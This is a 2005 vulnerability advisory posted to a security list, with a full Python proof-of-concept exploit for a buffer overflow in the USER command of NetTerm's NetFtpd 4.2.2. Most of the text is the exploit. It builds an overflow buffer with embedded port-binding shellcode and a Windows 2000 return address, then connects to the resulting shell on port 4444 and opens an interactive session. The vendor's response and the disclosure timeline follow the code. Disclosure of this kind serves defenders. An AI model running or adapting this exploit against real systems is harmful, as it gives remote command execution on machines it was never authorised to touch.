ADV: NetTerm's NetFtpd 4.2.2 Buffer Overflow + PoC Exploit
See attached files.
Cheers,
shadown
--
Sergio Alvarez
Security, Research & Development
IT Security Consultant
email: shadown@xxxxxxxxx
This message is confidential. It may also contain information that is
privileged or otherwise legally exempt from disclosure. If you have
received it by mistake please let us know by e-mail immediately and
delete it from your system; should also not copy the message nor
disclose its contents to anyone. Many thanks.
#
# Net-ftpd 4.2.2 user autentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#
import struct
import socket
import sys
import time
class warftpd:
def __init__(self, host, port):
self.host = host
self.port = port
self.bsize = 512
self.ebpaddr = 0xcacacaca
self.retaddr = 0xdeadbeef
self.sctype = 'findskt'
self.scport = None
def setebpaddr(self, addr):
self.ebpaddr = addr
def setretaddr(self, addr):
self.retaddr = addr
def setbsize(self, size):
self.bsize = size
def setsctype(self, type):
self.sctype = type
def setscport(self, port):
self.scport = port
def genbuffer(self):
##
# Alpha port bind 4444, thanx metasploit
##
sc =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
sc +=
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x51\x5a\x6a\x46"
sc +=
"\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x56\x42\x32\x42\x41\x32"
sc +=
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x6b\x4c\x70"
sc +=
"\x6a\x78\x6b\x70\x4f\x6d\x38\x59\x69\x49\x6f\x69\x6f\x6b\x4f\x61"
sc +=
"\x70\x4c\x4b\x70\x6c\x35\x74\x66\x44\x6c\x4b\x73\x75\x45\x6c\x4c"
sc +=
"\x4b\x31\x6c\x55\x55\x62\x58\x54\x41\x38\x6f\x6e\x6b\x50\x4f\x57"
sc +=
"\x68\x4c\x4b\x33\x6f\x65\x70\x56\x61\x38\x6b\x69\x73\x50\x30\x37"
sc +=
"\x39\x6c\x4b\x50\x34\x4e\x6b\x77\x71\x58\x6e\x34\x71\x4b\x70\x4a"
sc +=
"\x39\x6e\x4c\x6b\x34\x4f\x30\x64\x34\x35\x57\x6b\x71\x6b\x7a\x56"
sc +=
"\x6d\x53\x31\x78\x42\x7a\x4b\x69\x64\x35\x6b\x32\x74\x61\x34\x76"
sc +=
"\x48\x44\x35\x4d\x33\x4c\x4b\x63\x6f\x56\x44\x37\x71\x5a\x4b\x50"
sc +=
"\x66\x6e\x6b\x66\x6c\x32\x6b\x4c\x4b\x31\x4f\x45\x4c\x75\x51\x38"
sc +=
"\x6b\x34\x43\x76\x4c\x4c\x4b\x6b\x39\x72\x4c\x45\x74\x47\x6c\x63"
sc +=
"\x51\x7a\x63\x45\x61\x4f\x30\x53\x54\x4e\x6b\x67\x30\x30\x30\x4c"
sc +=
"\x4b\x63\x70\x34\x4c\x4e\x6b\x34\x30\x37\x6c\x4e\x4d\x4e\x6b\x71"
sc +=
"\x50\x55\x58\x61\x4e\x73\x58\x6e\x6e\x70\x4e\x64\x4e\x68\x6c\x70"
sc +=
"\x50\x4b\x4f\x6b\x66\x30\x31\x49\x4b\x50\x66\x52\x73\x53\x56\x30"
sc +=
"\x68\x74\x73\x57\x42\x43\x58\x61\x67\x61\x63\x75\x62\x63\x6f\x36"
sc +=
"\x34\x49\x6f\x58\x50\x45\x38\x4a\x6b\x4a\x4d\x39\x6c\x57\x4b\x56"
sc +=
"\x30\x69\x6f\x5a\x76\x43\x6f\x4d\x59\x78\x65\x35\x36\x4c\x41\x48"
sc +=
"\x6d\x66\x68\x37\x72\x71\x45\x62\x4a\x64\x42\x6b\x4f\x38\x50\x35"
sc +=
"\x38\x6e\x39\x64\x49\x7a\x55\x4c\x6d\x31\x47\x79\x6f\x6e\x36\x56"
sc +=
"\x33\x62\x73\x72\x73\x30\x53\x71\x43\x77\x33\x30\x53\x67\x33\x36"
sc +=
"\x33\x59\x6f\x7a\x70\x30\x66\x70\x68\x76\x71\x73\x6c\x41\x76\x72"
sc +=
"\x73\x6f\x79\x7a\x41\x4c\x55\x32\x48\x4c\x64\x44\x5a\x74\x30\x4a"
sc +=
"\x67\x56\x37\x49\x6f\x4a\x76\x51\x7a\x44\x50\x42\x71\x53\x65\x6b"
sc +=
"\x4f\x38\x50\x30\x68\x6f\x54\x4e\x4d\x44\x6e\x79\x79\x30\x57\x79"
sc +=
"\x6f\x68\x56\x41\x43\x30\x55\x4b\x4f\x4a\x70\x52\x48\x4d\x35\x67"
sc +=
"\x39\x6f\x76\x30\x49\x33\x67\x6b\x4f\x4a\x76\x72\x70\x63\x64\x61"
sc +=
"\x44\x30\x55\x49\x6f\x38\x50\x4c\x53\x65\x38\x4b\x57\x72\x59\x6a"
sc +=
"\x66\x63\x49\x72\x77\x69\x6f\x78\x56\x41\x45\x4b\x4f\x6a\x70\x70"
sc +=
"\x66\x70\x6a\x63\x54\x61\x76\x30\x68\x43\x53\x72\x4d\x6c\x49\x68"
sc +=
"\x65\x53\x5a\x70\x50\x53\x69\x76\x49\x6a\x6c\x6f\x79\x4d\x37\x61"
sc +=
"\x7a\x67\x34\x4e\x69\x59\x72\x37\x41\x6b\x70\x6a\x53\x4c\x6a\x59"
sc +=
"\x6e\x53\x72\x56\x4d\x59\x6e\x33\x72\x64\x6c\x6c\x53\x4e\x6d\x42"
sc +=
"\x5a\x35\x68\x4c\x6b\x6e\x4b\x4e\x4b\x72\x48\x44\x32\x6b\x4e\x4d"
sc +=
"\x63\x54\x56\x79\x6f\x43\x45\x32\x64\x6b\x4f\x6b\x66\x33\x6b\x53"
sc +=
"\x67\x30\x52\x63\x61\x66\x31\x52\x71\x53\x5a\x74\x41\x56\x31\x32"
sc +=
"\x71\x73\x65\x50\x51\x4b\x4f\x5a\x70\x32\x48\x6c\x6d\x4a\x79\x47"
sc +=
"\x75\x48\x4e\x62\x73\x6b\x4f\x7a\x76\x61\x7a\x6b\x4f\x6b\x4f\x35"
sc +=
"\x67\x6b\x4f\x68\x50\x6e\x6b\x31\x47\x4b\x4c\x6d\x53\x68\x44\x41"
sc +=
"\x74\x4b\x4f\x4e\x36\x36\x32\x49\x6f\x68\x50\x75\x38\x6c\x30\x4f"
sc +=
"\x7a\x56\x64\x31\x4f\x43\x63\x59\x6f\x4a\x76\x4b\x4f\x38\x50\x46"
# shellcode
#sc =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
#sc +=
"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
#sc +=
"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
#sc +=
"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
#sc +=
"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
#sc +=
"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
#sc +=
"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
#sc +=
"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
#sc +=
"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
#sc +=
"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
#sc +=
"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
#sc +=
"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
#sc +=
"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
#sc +=
"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
#sc +=
"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
#sc +=
"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
#sc +=
"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
#sc +=
"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
#sc +=
"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
#sc +=
"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
#sc +=
"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
#sc +=
"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
#sc +=
"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
#sc +=
"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
#sc +=
"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
# other stuff
nops = "\x41"*(self.bsize-len(sc)-50)
ebp = struct.pack('<L', self.ebpaddr)
# check if the value is an integer, otherwise it should be a
string
if self.retaddr.__class__.__name__ == 'int':
ret = struct.pack('<L', self.retaddr)
else:
ret = self.retaddr
# assemble buffer to send
buffer = "USER "
buffer += nops
buffer += sc
buffer += '\x42'*(50-4)
buffer += ebp
buffer += ret
return buffer
def exploit(self):
# connect
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
skt.connect((self.host, self.port))
except socket.error, err:
print "[-] Error: %s" % err[1]
return None
print "[+] Connected to %s:%d" % (self.host, self.port)
# recv banner
print "[+] Receiving Banner"
res = skt.recv(100)
print res
# send payload
time.sleep(1)
print "[+] Sending payload"
skt.send(self.genbuffer())
time.sleep(2) # test on mcafee anti-b0f
skt.close()
# if successfull connect to the shell
time.sleep(2)
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
skt.connect((self.host, 4444))
except socket.error, err:
print "[-] Error: %s" % err[1]
print "[-] Explotation failed\n[-] Daemon should be
dead..."
return None
print "[+] Connected to shell at %s on port %d" % (self.host,
4444)
res = skt.recv(1024)
if res:
if res.count('Microsoft Windows'):
print "[+] Welcome my lord, i'm here to serve
you ;) ...\n"
from telnetlib import Telnet
telnet = Telnet()
telnet.sock = skt
try:
telnet.interact()
except:
pass
skt.close()
print "[-] Bye..bye I hope you've enjoyed your
stay.. ;)"
return None
skt.close()
print '[-] Explotation failed\nDaemon should be dead...'
if __name__ == '__main__':
if len(sys.argv) != 3:
print "*************************************"
print "* Coded by Sergio 'shadown' Alvarez *"
print "* shadown@xxxxxxxxx *"
print "*************************************"
print "Usage: %s host port" % sys.argv[0]
sys.exit(1)
exp = warftpd(sys.argv[1], int(sys.argv[2]))
exp.setsctype('findskt')
exp.setscport(1234)
exp.setbsize(1014)
exp.setebpaddr(0xdeadbeef) # sometimes needed, just in case
exp.setretaddr('\x4c\xfa\x12\x00') # Universal Win2k
SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)
exp.exploit()
Vendor: InterSoft International Inc.
Product: NetTerm
Version: 5.1.1, probably lower versions too
Vulnerability Type: Buffer Overflow
Download Link: http://www.securenetterm.com/pub/nt32511i.exe
Credits:
Discovered by Sergio 'shadown' Alvarez, while dictating a 'Vuln-Dev on Win32
and Exploits Coding' course.
History:
Discovered date: 21/04/2005
Reported: 26/04/2005
Vendor Response: 26/04/2005
This is a known bug that has been reported to our clients.
Netftpd was a free addition to our NetTerm product, at the
request of our clients.
They were warned to never use netftpd as a general purpose ftp
server, and to only use it behind a firewall.
However, it does still present a potential problem, so we have
removed it from the NetTerm distribution.
Our www site at www.netterm.com and www.securenetterm.com has
been updated with a version of NetTerm that does not contain the netftpd.exe
program.
We will also update the What's New page on both web sites for
the new release in the next two days.
Thanks for bringing to to our attention.
Ken
Patch Release: None
Public Advisorie: 26/04/2005
Description:
NetTerm is one of the most used win32 telnet client software.
Vulnerabilitie:
NetTerm's NetFtpd 4.2.2 has a buffer overflow on authentication. I've just
tested 'user' command, but probably other commands are vulnerable too.
Patch:
None.
WorkAround:
Don't use it.
PoC Exploit:
Attached is a working exploit for Win2k, any SP.